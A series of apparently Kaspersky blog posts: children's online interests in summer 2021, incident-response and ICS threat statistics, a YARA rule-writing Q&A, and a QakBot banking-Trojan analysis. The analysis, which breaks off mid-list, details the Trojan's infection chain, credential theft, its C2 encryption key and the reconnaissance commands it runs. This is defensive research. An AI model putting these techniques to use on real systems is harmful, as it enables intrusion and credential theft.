This summer, children most often used computers running Windows and macOS to watch videos and listen to music. Nearly half of all visits to websites from desktop computers were in the “Software, audio, video” category (44.92%). In second place was “Internet communication” (18.09%). “Online stores, banks, payment systems” rounded out the three most popular categories (16.04%). Interestingly, in a recent article about children’s interests in 2020 and 2021, we found that the third most popular category — with “Online stores” closely behind — was “Videogames”, but this summer it slipped to fourth place (15.26%). The rise in popularity of the e-commerce is not surprising: during the pandemic over the last year and a half, people have been turning more to online shopping, and children have been part of this trend.

“News media” was the fifth most popular category (3.54%). We cannot discuss this category without mentioning the Tokyo Olympics and the UEFA European Football Championship, which both took place this summer. Global media outlets closely followed these major sporting events. However, contrary to expectations, children did not pay more attention to them than to any other news during the year.

Android apps

The list of the 10 most popular Android apps that children all over the world used most actively this summer completes the picture of this generation’s interests.

TOP 10 most popular Android apps, June through August 2021 (download)

Children spent the most time on the YouTube app: 32.95% of the total number of hours they spent on the TOP 10 apps. TikTok was second. At its inception, TikTok seemed like a fad that would dwindle away, but its popularity continues to grow. Between November 2020 and April 2021, it was the third most visited app: children spent 14.96% of their time on it. Now, however, it sits solidly in second place, accounting for 19.34% of the total time children spent on the 10 most popular apps, noticeably surpassing Instagram (5.15%), which is steadily losing ground among this age group. WhatsApp rounded out the top three apps, at 16.43%. Another mobile social network, Snapchat, came in last place in the TOP 10, at 2.24%.

Children spent nearly the same amount of time on the popular mobile games Brawl Stars (6.47%) and Roblox (6.46%). The mobile version of Minecraft was eighth, with 2.71%.

Children spent 5.91% of their time in the Google Chrome Browser and 2.34% of their time watching TV shows on Netflix.

Comparing the popularity of the YouTube app and websites in the “Software, audio, video” category — which youtube.com also belongs to — suggests that the YouTube service dominates the battle for children’s attention. Therefore, analyzing the anonymized data on what children searched for on YouTube will offer a clear picture of what captivated them this summer.

YouTube search queries

Children’s YouTube searches distribution by subject category, June through August 2021 (download)

The most frequently searched topic, representing 32.25% of searches, was computer games. We will examine these searches in greater detail below. The second most common category, at 18.43%, was queries about various bloggers, who cover a range of content from challenges to lifestyle. The most popular blogger over the summer was SSSniperWolf: children all over the world most frequently searched for her. The third largest search category was artists, music videos and tracks, at 18.37%. Search queries about movies, TV shows and cartoons represented 12.88% of the total. Gacha Life, which we wrote about in detail in our annual report, accounted for 5.35% of searches. Various trends represented 3.62% of searches. Among these was the Body Switch Challenge, a summer hit in which people temporarily swap places and pretend to be each other.

Computer games

The most frequently recurring search queries on YouTube related to computer games. Of the 1,000 most popular searches by children around the world during summer 2021, 32.25% were about computer games. What exactly were children interested in?

Most popular YouTube searches related to computer games, June through August 2021 (download)

Children most often — 44.29% of all gaming-related queries — searched for the channels of their favorite game bloggers. Among the bloggers children most often searched for were the English-speaking Let’s Players SSundee and MrBeast Gaming, the German-speaking Paluten and the Russian-speaking EdisonPts.

The second most common category of searches, at 25.86%, was all things Minecraft. The most popular search term in this category was “minecraft.” English-speaking children also often searched for the Minecraft Let’s Player Dream, while Russian-speaking children searched for the blogger Compot.

Children also performed searches for popular games such as Fortnite (5.31%) and Brawl Stars (4.93%) — which they especially gravitated to in the last year — as well as a tried-and-true favorite, Roblox (4.55%).

This summer children were particularly drawn to the rhythm game Friday Night Funkin’ (2.61%), making it worth discussing separately. The game involves pressing specific keys in time with the music. Among Us, which was once a wildly popular game, slipped in the rankings: it represented only 1.01% of searches — by comparison, this figure was 3.80% between November 2020 and April 2021.

Screenshot from the game Friday Night Funkin’

Two game consoles — Sony PlayStation and Nintendo Switch — made the list of TOP 1000 search queries by children. There were more searches related to Nintendo than to PlayStation: 1.11% versus 0.16%.

The other searches in this category related to games we felt did not merit separate discussion. This summer, the most popular of these were Just Dance, Five Nights at Freddy’s and Apex Legends.


Children are traditionally also interested in musical content. This summer, Music represented 18.37% of the TOP 1000 YouTube searches. In line with overall recent trends, TikTok continued to influence children’s musical preferences as they most often searched for music that went viral thanks to this social network.

The summer’s most popular track was Masked Wolf’s “Astronaut in the Ocean.” The most popular artists were Ariana Grande and Lil Nas X. Morgenshtern was the decisive favorite of Russian-speaking children.

In late May 2021, the long-awaited Eurovision Song Contest was finally held. Eurovision was canceled last year due to the pandemic, but it was already apparent that TikTok helped some of the songs from the competition go viral. This happened, for example, with the track by Little Big, which was supposed to represent Russia. This year we saw that children and adolescents were in fact interested in Eurovision. During the summer, the winner, the Italian group Måneskin, was one of the most popular artists among children and adolescents around the world. They most frequently searched YouTube for the group’s tracks “Beggin’,” “I Wanna Be Your Slave” and of course, the winning Eurovision song, “Zitti e Buoni.”

Movies, cartoons and TV shows

Distribution of YouTube search queries in Movies, cartoons and TV shows category (download)

In addition to watching their favorite bloggers and music videos, this past summer children spent time watching cartoons and TV shows, and they searched for trailers of upcoming movies. This topic accounted for 12.88% of YouTube search queries. The most popular content in this category was cartoons (46.16%), with children all over the world most often searching for “Peppa Pig” and “Ladybug & Cat Noir.”

Along with cartoons, children sought out a variety of TV and YouTube shows (26.65%), including Dance Moms and Inside Edition in English, and Eralash and What Was Next (a YouTube comedy show) in Russian.

Children were also interested in anime this summer: searches for it represented 20.20% of queries. The most popular anime series among children is still “Naruto.”

Based on the number of searches, children are most eagerly anticipating the films “Spider-Man: No Way Home,” which will be released in December 2021, and “Venom: Let There Be Carnage,” which is slated for release in October.


Eurovision was not the only 2020 event that was postponed due to the pandemic. Two major sporting events were also rescheduled for this summer: the 2020 UEFA European Football Championship and the Tokyo Olympics. There was no uptick in children’s interest in these events. Sports accounted for only 0.88% of YouTube searches, which is just slightly higher than the figure for the period from November 2020 to April 2021, when the topic accounted for 0.68% of searches.

Although toys were the subject of only 0.82% of searches, children across the world had a clear favorite this summer: the pop it and simple dimple antistress toys. Songs about these toys immediately went viral on TikTok, and YouTube was inundated with reviews of them. Just as a few years ago children everywhere were obsessed with the spinner — remember that one? — this summer they went crazy for pop it.


As we have noted, children’s habits and interest in certain types of content tend not to change. However, the content itself does change. The game Friday Night Funkin’ is gradually overtaking Among Us in popularity. Pop it has supplanted the long-forgotten spinner, while the Eurovision winners knocked the K-pop groups BTS and BlackPink off their pedestal as the most popular groups among children. At the same time, there are topics that children have been gravitating to for years: the games Minecraft and Roblox, the singer Ariana Grande and YouTube videos. This is also not the first year when the social network TikTok is on top, and children are spending ever more time watching short videos on it.

This summer also showed that children are more keen on music than sports. The younger generation was much more absorbed by Eurovision than the Olympics or Euro 2020.

To cultivate trusting relationships with your children, it is important to be up to date on what they are interested in now, give them gifts that reflect their interests and talk about topics that excite them. In this report we have discussed anonymized statistics that show the big picture, but you can use parental controls to find out what makes your child happiest: the plush character from the game Among Us, pop it or, say, breaking out the candy and having a Eurovision family watch party.

2021. szeptember 13.

Incident response analyst report 2020

 Download full report (PDF)

The Incident response analyst report provides insights into incident investigation services conducted by Kaspersky in 2020. We deliver a range of services to help organizations when they are in need: incident response, digital forensics and malware analysis. Data in the report comes from our daily practices with organizations seeking assistance with full-blown incident response or complementary expert activities for their internal incident response teams.

In 2020, the pandemic forced companies to restructure their information security practices, accommodating a work-from-home (WFH) approach. Although key trends in terms of threats have stayed the same, our service approach moved to a near-complete – 97% of all cases – remote delivery.

Geography of incident responses by region, 2020

Most of the incident handling requests were received from the CIS (27.8%), European Union (24.7%) and the Middle East (22.7%) regions. In 2020, organizations seeking our assistance represented a wide spectrum of business sectors, industry, finance, government, telecoms, transportation and healthcare.

Share of incident responses by vertical and industry, 2020

Industrial businesses were the most affected by cyberattacks (22%), followed by government institutions (19%). Most of our responses were ransomware-related: in 32.7% of true positive cases, the incidents were caused by encrypted files.

Overall, the Incident response analyst report 2020 contains four chapters:

  • Reasons to go for incident response
    Most of the incidents with causes before the impact can be confidently classified as ransomware. This threat is overtaking money theft and other impacts as a more convenient monetization scheme with much broader industry coverage (not just finance).
  • Initial vectors, or how attackers got in
    Security issues with passwords, software vulnerabilities and social engineering combined into an overwhelming majority of initial access vectors during attacks.
  • Tools and exploits
    Almost half of all incident cases included the use of existing OS tools (like LOLbins), well-known offensive tools from GitHub (e.g. Mimikatz, AdFind, Masscan) and specialized commercial frameworks (Cobalt Strike).
  • Attack duration
    We grouped all incident cases into three categories with different attacker dwell times, incident response duration, initial access, and impact from the attack.

To learn more on these topics, please read the full report (English, PDF).

2021. szeptember 9.

Threat landscape for industrial automation systems in H1 2021

The H1 2021 ICS threat report at a glance Percentage of ICS computers attacked
  1. During the first half of 2021 (H1 2021), the percentage of attacked ICS computers was 8%, which was 0.4 percentage points (p.p.) higher than that for H2 2020.

    Percentage of ICS computers on which malicious objects were blocked (download)

    Numbers per country varied from 58.4% in Algeria to 6.8% in Israel.

    Top 15 countries and territories with the largest percentages of ICS computers on which malicious objects were blocked in H1 2021 (download)

    Top 10 countries and territories with the lowest percentages of ICS computers on which malicious objects were blocked in H1 2021 (download)

    When we look at regional numbers, Africa led with 46.1%, followed by Southeast Asia at 44.1%, East Asia at 43.1% and Central Asia at 42.1%.

    Percentage of ICS computers on which malicious objects were blocked, by region (download)

  2. The largest increases in the percentage of attacked ICS computers during H1 2021 were as follows:
    • Over 10 p.p. in Belarus (50.4%) and Ukraine (33.1%);
    • 4 p.p. in the Czech Republic (20.2%) and Slovakia (24.3%);
    • 5 p.p. in Hong Kong (20.8%);
    • 6 p.p. in Australia (23%) and Cameroon (45.2%).

    The internet was the main source of threats causing these increases.

  3. The percentage of ICS computers on which threats were blocked decreased in all monitored industries. This was especially noticeable in the oil and gas (36.5%) and building automation (40.3%) sectors (-7.5 p.p. and -6.3 p.p., respectively).

Percentage of ICS computers on which malicious objects were blocked in selected industries (download)

Major threat sources

The internet, removable media and email continue to be the main sources of threats to computers in ICS environments.

Percentage of ICS computers on which malicious objects from various sources were blocked (download)

  1. Threats from the internet were blocked on 18.2% of ICS computers
  2. (+1.5 p.p.).

    In H1 2021, the largest increases in this indicator were observed in Belarus (+12.2 p.p.), Ukraine (+8 p.p.) and Russia (+6.7 p.p.)

    Russia led the regional rankings with 27.6%.

    Percentage of ICS computers on which malicious objects from the internet were blocked, by region (download)

    Belarus leads in the country rankings with 32.8%.

    Top 15 countries and territories with the highest percentages of ICS computers on which internet threats were blocked in H1 2021 (download)

  3. Threats arriving via removable media were blocked on 5.2% of ICS computers (-0.2 p.p.), which continued a downward trend that began in H2 2019.
    Africa leads noticeably in the regional rankings with 15.6%. In H1 2021, the percentage of ICS computers on which threats were blocked when removable media were connected decreased in Asian regions.

    Regions ranked by percentage of ICS comuters on which malware was blocked when removable media was connected in H1 2021 (download)

    Algeria leads among individual countries with 24%.

    Fifteen countries and territories with the largest percentage of ICS computers on which malware was blocked when removable media was connected in H1 2021 (download)

  4. Malicious email attachments were blocked on 3.4% of ICS computers (-0.6 p.p.).
    Southern Europe ranked the highest with 6.4%. The only region where the percentage increased was Australia and New Zealand (+1.3 p.p.).

    Regions ranked by percentage of ICS computers on which malicious email attachments were blocked in H1 2021 (download)

    Bangladesh led among individual countries with 8.8%.

    Top 15 countries with the highest percentages of ICS computers on which malicious email attachments were blocked in H1 2021 (download)

    The variety of malware detected

    In H1 2021, Kaspersky security solutions blocked more than 20.1 thousand malware variants from 5,150 families in ICS environments.

  5. Denylisted internet resources were the main threat source and were blocked on 14% of ICS computers.
    Threat actors use malicious scripts on various media resources and sites hosting pirated content. These scripts redirect users to websites that spread spyware and/or cryptocurrency miners. The percentage of computers where this type of threats was blocked has grown since 2020.
  6. Malicious scripts and redirects (JS and HTML) were blocked on 8.8% of ICS computers (+0.7 p.p.).
    Australia and New Zealand (+3.8 p.p.), as well as Russia (+4.4 p.p.) saw a noticeable growth in the percentage of computers where malicious scripts used for downloading spyware were blocked.
  7. Spyware (backdoors, trojan spies and keyloggers) were blocked on 7.4% of ICS computers (+0.4 p.p.).
    This figure was highest in East Asia (14.3%), Africa (13.4%) and Southeast Asia (11.2%).
  8. Ransomware was blocked on 0.40% of ICS computers (-0.1 p.p.)
    This figure was highest in East Asia with 0.82%.

    In the Middle East, we saw an increase in the percentage of computers on which worms (+0.4 p.p.) and ransomware (+0.3 p.p.) were blocked.

    Percentage of ICS computers on which malicious objects from various categories were blocked (download)

    1. The full report is available on the Kaspersky ICS CERT website.
2021. szeptember 3.

Applied YARA training Q&A


On August 31, 2021 we ran a joint webinar between VirusTotal and Kaspersky, with a focus on YARA rules best practices and real world examples. If you didn’t have the chance to watch the webinar live, you can see it as a recording on Brighttalk: Applied YARA training.

During the webinar we received an overwhelming response and we would like to thank all the participants for sharing their thoughts, questions and ideas; most of all, we are happy to see so much interest and enthusiasm for YARA!

During the 90 minutes of the webinar we only had the chance to answer a fraction of the questions we received. We would still like to answer the remaining ones, since we thought a lot of them are quite relevant to real world situations, practices and could be useful to other security practitioners. Even better, for the more tricky questions we decided to ask for help from the creator of YARA itself, Victor Manuel Alvarez (aka Hector Manuel Velasquez) who will help answer them. If you have further questions, please feel free to send them to us in the comments section. We will be happy to answer them too!

Stay safe, stay secure and Happy hunting!

Costin, Vicente and Victor


Q: How difficult is it writing a YARA rule for obfuscated payloads?
Q: What file features normally you experts often look into when it comes to obfuscated files? How can YARA help?
Q: What would be your tip / best practices for writing rules to catch obfuscated binaries?

Vicente here. Obfuscated files are tricky, but YARA can still be useful. We can use all the metadata and file geometry for the detection. Also, depending where the obfuscation is, maybe we can also use some portions of the code for the detection — for instance if it only obfuscates strings with some custom method, maybe the code used for obfuscation can be useful.

Costin here. In general, it is a lot more difficult to write YARA rules for obfuscated payloads. Depending on the obfuscation method, one can still find some ways to detect them. For example, assuming a specific cryptor or packer was used, you can still write a rule for the packer (eg. UPX) or, rely on an unpacking engine to give you the plain code. Some platforms, such as VirusTotal, would automatically unpack known tools for you, which allows one to write simple YARA rules for the unpacked code. When the obfuscation is polymorphic, for instance, the code is expanded with dummy instructions and operands are split within several operations, once can try to use other file properties, such as metadata, entropy, import hashes or other data which stays constants across different generation. In short, there is no rule on how to write rules for obfuscated code, but in some cases, it is possible.

Q: Do hashes used for API hashing for example would be helpful for a YARA rule? Since this can change in a future campaign, i’m in doubt.

Costin here. Absolutely — API hashing can be super useful for detection of malware, especially when there are very few unique strings that can be used in the rule, or, when the malware is otherwise obfuscated. YARA actually provides a nice easy to use solution — the PE module implements the standard Mandiant import hash function as pe.imphash(). This can be used in a YARA rule condition such as:

Q: Are you trying rules against a set of malware before releasing it?

Costin here. Yes, extensive QA of a YARA rule is critical for us before releasing it publicly or to customers. For this purpose, we use several internal databases, of both malicious files and known clean code. To make sure the YARA rule detects more than just one sample, we try to run it against our entire malware collection, which is over five petabytes at the moment. Sometimes, when time is essential, we run it on a subset of the malware collection, such as specific PE files received during the last 12 months, or, say, script files. In many cases, testing a rule on clean files is even more important than testing it on malware! Based on our experience, we’ve seen countless instances of YARA rules that were published by security companies or even governmental agencies which produced false positives when used on a real system. To simplify testing of YARA rules, you can either use VirusTotal’s Retrohunt feature, or set up a test of your own collections using our open source KLARA project.

Q: Won’t typos also restrict the YARA rule to a particular sample or samples distributed under one campaign?

Vicente here. That could happen, but maybe the typos are difficult to replace. For example, sometimes typos are in the commands that the malware receives from the server, which would need a redeployment of server and client side malware from the attacker. In some other cases attackers get fully unaware of the typo, maybe because they are not familiar with the language and just use a weird expression that no native speaker would use, and can stay there forever. We can find these typos everywhere, including metadata, comments, etc.

Q: Where are good sources for large amounts of known good clean data?

Costin here. There are several public, free good sources of known good clean data. Some have suggested the NIST reference set, however, you can also build your own from things like a Windows installation, Linux install, Android/iOS dumps and the likes. It’s important to also have third party software, such as Chrome, Firefox or Adobe Reader. A lot of false positives produced by publicly available YARA rules occur on software such as the ones above!

Q: How useful are YARA Rule Generators like Florian Roth’s yarGen?

Vicente here. YARA rule generators are VERY useful, but we do not recommend using raw generated rules without an extra round of manual polishing. We believe it is more useful to use it for a first round to extract potentially relevant strings from a collection of samples we are analyzing, and from here use these results to help us build more refined rules.

Q: Is it better to use wide, wide ASCII, both, or none?

Costin here. Using wide, ASCII or both (or none) depends on a case by case basis. Depending on how a malware piece is compiled, the strings you see inside could be ASCII (single byte) or wide (double byte, Unicode). YARA allows you to easily search for UTF-16 strings through the wide modifier. By default, ASCII is used every time you assign a string to a variable, however, if you want to search both, you need to use “ASCII wide”. Adding “wide” to the ASCII strings you are searching for might find you additional stuff.

Q: If a rule generates false positives on a very specific sample, would you suppress a specific hash in the rule directly or rather improve the whole logic?

Vicente here. The answer is — “it depends”. If there is a very particular binary that produces a false positive in an otherwise solid rule, we can keep the rule as long as we know what we are doing — for example we use it for hunting privately, and just exclude that specific FP file by hash. In case this rule would be used externally or automatically, for instance in a production environment for detection, then better to avoid this false positive in the logic.

Q: Some programming languages have automatic formatters (like ‘Black’ in Python, or gofmt in Golang) — do you recommend something similar for YARA, to maintain good formatting across a team?

Víctor here. As far as I know such a tool doesn’t exist. There are some alternative parsers for YARA, which are able to read a YARA source file, build an abstract syntax tree (AST) from it, and regenerate the source code from the AST. But they have limitations that make them unsuitable for building a tool like gofmt (for example the comments are completely lost).


Q: Does YARA “digest” and optimize a ruleset for example user writes “i001” and “i001”

Víctor here. YARA doesn’t perform any optimization on the condition, they are evaluated exactly as they are written. No attempt is made to detect useless branches in the condition, if you write “X or Y or Z or true” YARA evaluates X, Y and Z, it is not smart enough to realize that the condition is always true. Also, if you use the same pattern/string in different rules they are treated as if they were different, YARA doesn’t realize that you are searching for the same string.

Q: Can YARA run on only files with macOS xattributes for example com.apple.metadata:kMDItemDownloadedDate, com.apple.quarantine?

Vicente here. At the moment, I’m not aware of any module able to interact with them.

Q: I have seen that hash is case sensitive .. i have to use lower case. Will this change in future?
Q: Hash looks like case sensitive. Can you confirm that?

Víctor here. The next version of YARA will include the icompare operator for case-insensitive string comparison. The == operator maintains its case-sensitive semantic when used for comparing strings, but with icompare you don’t need to worry about whether the values returned by the hash module are upper or lower case.

Q: Does YARA see filename in the file set?

Vicente here. At the moment, you cannot specify any condition about the filename in a rule, as YARA is designed just to check the content and structure of the file and the file name can easily change. Nevertheless, this option exists in case you use the VT YARA module, which is available to take advantage of file metadata for YARA rules running on VirusTotal. You can also use the -D option to define a variable in the rule that contains the filename.

Victor here. I would like to provide more context about this. The reason for not including a “filename” keyword in a similar way to “filesize” is because “filesize” makes sense in almost any context (except when scanning a process address space) as the data being scanned always have a size. However, “filename” makes sense when you are using the YARA command-line tool for scanning your hard drive, but it doesn’t make sense where YARA is scanning the data without knowing where the data comes from. However, due to the high number of times I’ve seen this question asked, I’m considering some intermediate solution, like allowing the command line tool to define a variable that automatically takes the name of the current file.

Q: Is it possible to use YARA to monitor strings in PDF documents? Or is it medium-dependent?

Vicente here. It is possible. However keep in mind that strings are not represented inside the file the same way they are displayed to a reader. It is important to check the content of the file itself with utilities such as “strings” or with any hex editor, and select which strings can be used for a YARA rule. But it will not necessarily work if you select strings based on how they appear in the PDF when displayed.

Q: Is YARA compatible with the ELK stack?

Vicente here. There are different available options, like plugins to incorporate events matching YARA rules into Elastic, for example.


Q: Is uint16(0) faster than $magic at 0? (Where $magic is the hex value)

Vicente and Costin here. The $magic check should be considered obsolete and is hopefully not used anymore in any public rules. Please kindly use uint16(0) or the Magic module instead. This is because defining a string such as $mz=”MZ” will cause YARA to search for this short string and save all the matches in a file, no matter the offset, which greatly increases the resource overload. This slows down scanning and eats up more memory. In general, short strings should be avoided in YARA rules for this reason, or always followed by the “fullword” modifier.

Q: In your experience, is CPU or I/O the bigger constraints? Can YARA run at low-priority? Only on user idle restricted to time schedule? I am thinking about tunability like worldCommunity grid. Does YARA use sophisticated I/O scheduling?

Víctor here. That depends a lot on your rules. If you have a few high-performance rules the bottleneck will certainly be I/O, but it can change drastically if you have many rules or they are not very fast. YARA doesn’t do anything special with regards to I/O, it just uses memory-mapped files and relies on the operating system for I/O. Both in Windows and Linux, YARA tells the operating system that files are likely to be read sequentially, so that the OS can take that into account and read-ahead aggressively.

Q: Hello. Is the “nocase” option efficient? We can never know what case we can find in a malware file, and maybe the “nocase” option increases the search time and the used resources. How to determine if we need this option?

Víctor here. It depends on the string, but generally speaking “nocase” introduces a performance penalty and it should be avoided if possible. Many people use “nocase” and “wide” just in case. They are not really sure about it, but they use them because it doesn’t do any harm (or so they think). My advice is doing exactly the opposite, if you don’t have a clear reason for using those modifiers, don’t do it. If you know for sure, or have good reasons for believing that the string can appear in some arbitrary casing, use “nocase”, but avoid it if otherwise.

Q: My understanding is that the ‘filesize’ condition is evaluated AFTER all strings have been processed. If this is the case, then filesize cannot be used to make rules more efficient by eliminating samples based on filesize BEFORE strings are evaluated. Is my understanding correct? If so, do you know the reason why filesize is evaluated after strings?

Víctor here. That’s 100% correct. The reason for that behavior is that YARA is optimized for the case in which you have many rules. From the performance standpoint the best thing to do when you have a lot of rules is scanning the file in a single pass first, looking for all the strings from all the rules at once, and then evaluate all the conditions. Evaluating the conditions first, searching for each string individually as they are used in the condition does not scale well when you have thousands of rules. With a very high number of rules the odds are that you are going to need reading and scanning the file anyways, as at least one of your conditions won’t filter out the file because of its size.


Q: if you have a mature team, and a large set of rules that were developed over time — do you have any thoughts on how to go back and re-evaluate if rules are still good, or need to be updated (and how often, etc.) — or other ways to track metrics on each rule? (‘Hey, this one fired once, and it was a great find — this second one fires with every SCR, and needs some work’)

Vicente here. This is an excellent question. What would be important is to create a policy based on your needs and how you use these rules. Some of the rules can be valid for years while others can change very rapidly, and that depends both on the rule itself and on the threat they monitor. It is always good to have a baseline detection per rule (what it should be detecting) and find alternative methods to double-check these detected samples indeed belong to the family/actor you are monitoring. From this point, you need to work on keeping updating these rules, detection methods and detected samples triad regularly, polishing rules as needed and replacing them once they are not relevant anymore.

Q: Is there a way to centrally run YARA rules to all network workstations without depending upon other third party tools like Nessus or supported antivirus platforms?

Vicente here. There are different EDRs and utilities to do so. However this kind of practice tends to be overkill in most cases. We recommend carefully selecting what rules to run, what folders and adding further conditions to the rules in order to avoid scanning unnecessary files (you can play with conditions such as file format, size, timestamps, etc).

Q: We have tried YARA ourselves and there’s no doubt about the capabilities. What we want to understand is what is the correct way to leverage YARA? Shall we scan some workstations regularly with industry/region specific threat intelligence? Or a better approach could be to run periodic scans based on targeted hypothesis based threat hunting? Shall we only run it to investigate incidents?

Vicente here. This totally depends on your goals, as all the above are very usual use cases. In most of the cases, you want to regularly scan a small percentage of sensitive or suspicious files on a regular basis. The same with your rules, you want to maybe use the ones corresponding with active and relevant threats. In parallel, you will always have your collection active for hunting and ready for any IR/forensic if needed.

Q: Can we also search within memory with YARA?

Vicente here. It is possible. There are several EDRs and tools that allow you to do so. Also, it is always possible to use YARA against a memdump, for instance using Volatility. Last but not least, you can directly scan a running process, if you know it’s PID, by running “YARA rule.YARA PID”.

Q: Is it possible to utilize hash detection with YARA?

Vicente and Costin here. Yes, it is. You can use the “hash” external module and calculate different hashes for files or sections. Here’s an example of such a rule from Github Xprotect.YARA:

Q: What do you recommend for managing a large collection of YARA rules (deduping, updating versions, etc)?

Vicente here. We do not recommend any utility in particular for this, many researchers simply use GitHub. Our recommendation in terms of procedures would be always checking that rules detect what they are supposed to detect and checking against false positives, and to do this regularly. One utility you can use in this direction is YARA-CI. We also recommend having different collections for different purposes, for instance Incident Response, Forensic, Hunting, Mem-scanning, etc.

Q: How can we start using YARA for malicious email attachments?

Vicente here. There are different mail security appliances that allow you to do so. You can always check attachments separately.

Q: For memory dump, I was not able to scan directly by attaching it, rather I had to mount its file system (e.g. MemProcFS) before YARA can work. Am I correct?

Vicente here. Right. Another option is using the dedicated utility in Volatility to run YARA against memdumps.


Q: Will VT allow us to scan older parts of the corpus with retrohunt?

Vicente here. At the moment, VirusTotal Retrohunt works on a 90 day back index that can be expanded to 1 year depending on your subscription.

Q: Can YARA rules be shared with the VT community, or these only can be shared from user to user?

Vicente here. We incorporate a number of repositories from the community as crowdsourced YARA rules, you can find a list of contributors here. If you would like to contribute, please contact us!

Q: Can we find strings inside pdf files on VirusTotal with YARA rules? We can see it working on other files types but not on pdf, we didn’t really see it working and could not find something about it on the VT YARA documentation.

Vicente here. As described in a previous question, nothing changes when using VirusTotal to find a string within a PDF than when using YARA in any other environment.

Q: What are ways of hunting with YARA beyond VirusTotal?

Vicente here. Hunting is a technique/art/discipline that can be done on any platform. Basically you just need a collection of data you can explore to find what you are looking for. Usually that would mean a collection of malware with as much data on top of it as possible. In VirusTotal we work hard to make it as convenient as possible.


Q: Also consider that you can tip off the threat actor that you have found their malware…

Vicente here. This is true. Many actors are interested in understanding how they are detected, which can become quite obvious when checking YARA rules publicly available. It is a cat and mouse game, but happily the fact that actors understand how they are being detected doesn’t mean they can avoid it in an easy or quick way.

Q: Can anyone explain why YARA was created with a unique schema (yet similar) compared to SQL? Do developers see YARA rules as a catch-all rule writing standard that will eventually become a standard for querying any data? I find YARA rules far easier to write/read than many formats, and it seems more modern, but the evolution is unclear.

Víctor here. The syntax was created with legibility in mind because YARA rules are intended to be created/consumed by humans. The idea was creating a language that looked more like a programming language than like SQL, in fact you can find reminiscences of C in YARA’s syntax. However, YARA doesn’t pretend to be a general purpose query language for usages outside the scope it was designed for. Any future enhancements in the syntax will be oriented towards improving expressiveness and legibility, but always within the boundaries of its current purpose.

Q: How do you communicate the importance and utility of incorporating threat hunting techniques (like writing YARA rules) to muggles?

Vicente here. Threat Hunting is one of the best techniques we have. We use it to defend ourselves from current attacks, by expanding our visibility and establishing monitoring on threats targeting us. It is also one of the most powerful weapons we have to detect unknown threat activity.

Q: Maybe I’m jumping ahead, please forgive me if I do; but how do commercial Anti-Virus companies use YARA to determine whether a file is being malicious? How do you deal with false-positives?

Vicente here. YARA is one of the methods or engines that AV companies might use to determine whether something is malicious. In essence it is not different from other methods, and depending how it is being used can lead to False Positives. As it usually happens, this has nothing to do with the tools used but with how solid the rules are, if they are being double-checked with any second method, if there is a reputation system in place, how good the heuristics are, etc.

That’s all for now!
Stay safe everyone and hope to see you at our next webinars!

Online resources:

2021. szeptember 2.

QakBot technical analysis

Main description

QakBot, also known as QBot, QuackBot and Pinkslipbot, is a banking Trojan that has existed for over a decade. It was found in the wild in 2007 and since then it has been continually maintained and developed.

In recent years, QakBot has become one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), though it has also acquired functionality allowing it to spy on financial operations, spread itself, and install ransomware in order to maximize revenue from compromised organizations.

To this day, QakBot continues to grow in terms of functionality, with even more capabilities and new techniques such as logging keystrokes, a backdoor functionality, and techniques to evade detection. It’s worth mentioning that the latter includes virtual environment detection, regular self-updates and cryptor/packer changes. In addition, QakBot tries to protect itself from being analyzed and debugged by experts and automated tools.

Another interesting piece of functionality is the ability to steal emails. These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails.

QakBot infection chain

QakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails were delivered with Microsoft Office documents (Word, Excel) or password-protected archives with the documents attached. The documents contained macros and victims were prompted to open the attachments with claims that they contained important information (e.g., an invoice). In some cases, the emails contained links to web pages distributing malicious documents.

However, there is another infection vector that involves a malicious QakBot payload being transferred to the victim’s machine via other malware on the compromised machine.

The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It’s known that various threat actors perform reconnaissance (OSINT) of target organizations beforehand to decide which infection vector is most suitable.

QakBot infection chain

The infection chain of recent QakBot releases (2020-2021 variants) is as follows:

  • The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download malicious document.
  • The user opens the malicious attachment/link and is tricked into clicking “Enable content”.
  • A malicious macro is executed. Some variants perform a ‘GET’ request to a URL requesting a ‘PNG’ However, the file is in fact a binary.
  • The loaded payload (stager) includes another binary containing encrypted resource modules. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime.
  • The ‘Stager’ loads the ‘Loader’ into the memory, which decrypts and runs the payload during runtime. The configuration settings are retrieved from another resource.
  • The payload communicates with the C2 server.
  • Additional threats such as ProLock ransomware can now be pushed to the infected machine.
Typical QakBot functions

Typical QakBot malicious activity observed in the wild includes:

  • Collecting information about the compromised host;
  • Creating scheduled tasks (privilege escalation and persistency);
  • Credentials harvesting:
    • Credential dumping (Mimikatz, exe access)*;
    • Password stealing (from browser data and cookies);
    • Targeting web banking links (web injects)*.
  • Password brute forcing;
  • Registry manipulation (persistence);
  • Creating a copy of itself;
  • Process injection to conceal the malicious process.
Communication with C2

The QakBot malware contains a list of 150 IP addresses hardcoded into the loader binary resource. Most of these addresses belong to other infected systems that are used as a proxy to forward traffic to other proxies or the real С2.

Communication with the С2 is a HTTPS POST request with Base64-encoded data. The data is encrypted with the RC4 algorithm. The static string “jHxastDcds)oMc=jvh7wdUhxcsdt2” and a random 16-byte sequence are used for encryption. The data itself is in JSON format.

Original message in JSON format

HTTPS POST request with encrypted JSON

Usually, after infection the bot sends a ‘PING’ message, ‘SYSTEM INFO’ message and ‘ASK for COMMAND’ message, and the C2 replies with ‘ACK’ and ‘COMMAND’ messages. If additional modules were pushed by the C2, the bot sends a ‘STOLEN INFO’ message containing data stolen by the modules.

  • ‘PING’ message – bot request message to C2 with ‘BOT ID’ in order to check if С2 is active:

‘PING’ message

  • ‘ACK’ message – C2 response message with field “16” containing the external IP address of the infected system, the only valuable information:

‘ACK’ message

  • ‘SYSTEM INFO’ message – bot request message to C2 with information collected about the infected system. In addition to general system information such as OS version and bitness, user name, computer name, domain, screen resolution, system time, system uptime and bot uptime, it also contains the results of the following utilities and WMI queries:
    • whoami /all
    • arp -a
    • ipconfig /all
    • net view /all
    • cmd /c set
    • nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.{DOMAIN}
    • nltest /domain_trusts /all_trusts
    • net share
    • route print
    • netstat -nao
    • net localgroup
    • qwinsta
    • WMI Query ROOT\CIMV2:Win32_BIOS
    • WMI Query ROOT\CIMV2:Win32_DiskDrive
